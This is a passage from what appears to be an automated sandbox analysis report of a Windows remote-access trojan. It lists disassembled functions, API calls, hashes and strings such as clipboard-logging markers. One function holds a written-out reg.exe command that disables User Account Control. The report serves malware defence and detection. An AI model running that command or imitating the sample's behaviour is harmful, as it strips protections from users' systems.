                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                        • API String ID: 2974294136-753205382
                                                                                                        • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                        • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                        • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                        • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                        Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                        • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                        • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                        • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                        • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                        • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                        Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                        Strings
                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                        • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                        • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                        Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                        • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                        • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                        Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: pth_unenc$BG
                                                                                                        • API String ID: 1818849710-2233081382
                                                                                                        • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                        • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                        Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                        • SetEvent.KERNEL32(?), ref: 00404AF9
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00404B0D
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                        • API String ID: 2993684571-305739064
                                                                                                        • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                        • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                        • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                        • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                        Function 00419F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                        • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                        • String ID: Alarm triggered
                                                                                                        • API String ID: 614609389-2816303416
                                                                                                        • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                        • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                        • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                        • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                        Function 0041BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                        Strings
                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                        • API String ID: 3024135584-2418719853
                                                                                                        • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                        • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                        Function 0044016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                        • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                        • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                        • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                        Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 3525466593-0
                                                                                                        • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                        • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                        • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                        • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                        Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                          • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 4269425633-0
                                                                                                        • Opcode ID: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                        • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                        • Opcode Fuzzy Hash: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                        • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                        Function 00443098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                        • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                        • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                        Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                        • __freea.LIBCMT ref: 0044FFC4
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 313313983-0
                                                                                                        • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                        • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                        • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                                                        • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                        Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                        • _free.LIBCMT ref: 0044E1A0
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 336800556-0
                                                                                                        • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                        • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                        • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                                        • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                        Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                                                        • _free.LIBCMT ref: 00446F7D
                                                                                                        • _free.LIBCMT ref: 00446FA4
                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                        • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                        • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                                                        • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                                        Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 0044F7B5
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 0044F7C7
                                                                                                        • _free.LIBCMT ref: 0044F7D9
                                                                                                        • _free.LIBCMT ref: 0044F7EB
                                                                                                        • _free.LIBCMT ref: 0044F7FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                        • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                        • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                        Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00443305
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 00443317
                                                                                                        • _free.LIBCMT ref: 0044332A
                                                                                                        • _free.LIBCMT ref: 0044333B
                                                                                                        • _free.LIBCMT ref: 0044334C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                        • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                        • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                        Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                        • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                          • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
